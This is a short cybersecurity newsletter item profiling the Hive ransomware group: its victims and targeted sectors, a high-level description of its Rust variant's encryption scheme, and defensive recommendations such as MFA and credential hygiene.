Cybersecurity Snapshots #34 - Hive Ransomware Group

Cybersecurity Snapshots #34 -

Hive Ransomware Group

Hive ransomware was first observed in June 2021 and the Hive ransomware group is believed to be based in Russia. Since then, it has grown into one of the most prevalent ransomware payloads in the Ransomware as a Service (RaaS) ecosystem. According to the Palo Alto Networks Incident Response Report, the group is now one of the top three active ransomware gangs. Analysis by the company's Unit 42 division revealed that Hive was responsible for 8% of observed ransomware attacks between May 2021 and April 2022, despite only emerging in the second half of 2021. Between August 1, 2021, to February 28, 2022, researchers at Trend Micro detected Hive ransomware on 1264 machines. The top 10 countries most targeted by the Hive ransomware gang in 2021 included Argentina (312), Brazil (216), United States (160), Thailand (127), Italy (89), Spain (67), Columbia (56), France (48), Saudi Arabia (41), and El Salvador (36). The top 10 sectors that were targeted by the Hive ransomware gang in 2021 included Energy (186), Healthcare (125), Financial (102), Media (55), Education (38), Materials (31), Manufacturing (30), Telecommunications (13), Technology (11), and Government (8). The Hive ransomware gang continues to infect many organizations with its ransomware.

Some of the Hive ransomware victims include Costa Rica's public health service, the largest European consumer electronics retailer MediaMarkt, one of Europe's largest car dealers, Emil Frey, Indonesian gas giant Perusahaan Gas Negara, US-based healthcare organizations Partnership HealthPlan, Memorial Healthcare System, and Empress EMS (Emergency Medical Services), the New York Racing Association (NYRA), Bell Technical Solutions (BTS) a subsidiary of Bell Canada, and multiple organizations with vulnerable Microsoft Exchange Servers.

Recently the Hive ransomware gang released a new variant of its ransomware. The main difference between the new Hive variant and the old one is the programming language used. The old variant was written in Go (also referred to as GoLang), while the new Hive variant is written in Rust. Rust has advantages over other programming languages for ransomware. Security researchers at Microsoft noted that Hive benefits from the following advantages by using Rust: it has several mechanisms for concurrency and parallelism, thus enabling fast and safe file encryption, has a good variety of cryptographic libraries, and is relatively more difficult to reverse-engineer. The new Hive variant uses string encryption, which can make it more evasive. The researchers noted that the most interesting change in the Hive variant is its cryptography mechanism. The new variant uses a different set of algorithms: Elliptic Curve Diffie-Hellmann (ECDH) with Curve25519 and XChaCha20-Poly1305 (authenticated encryption with ChaCha20 symmetric cipher). The new Hive variant also uses a unique approach to file encryption. The researchers noted that instead of embedding an encrypted key in each file that it encrypts, it generates two sets of keys in memory, uses them to encrypt files, and then encrypts and writes the sets to the root of the drive it encrypts, both with .key extension. After both keys files are written to the disk, the multi-threaded file encryption starts. The researchers noted that before encrypting each file, the malware checks its name and extension against a list of strings. If there is a match, then the file will not be encrypted.

The Hive ransomware group is expected to continue to be one of the most active ransomware groups this year. This means that organizations need to be aware of Hive ransomware. The security researchers at Microsoft noted some key ways to help organizations not be affected by ransomware. Organizations should require good credential hygiene and should be auditing credential exposure. Organizations should also prioritize deploying active directory updates and conducting cloud hardening. The researchers noted that organizations should also enforce MFA on all accounts, remove users excluded from MFA, and strictly require MFA from all devices, in all locations, at all times. The researchers also suggest that organizations should enable passwordless authentication methods and disable legacy authentication.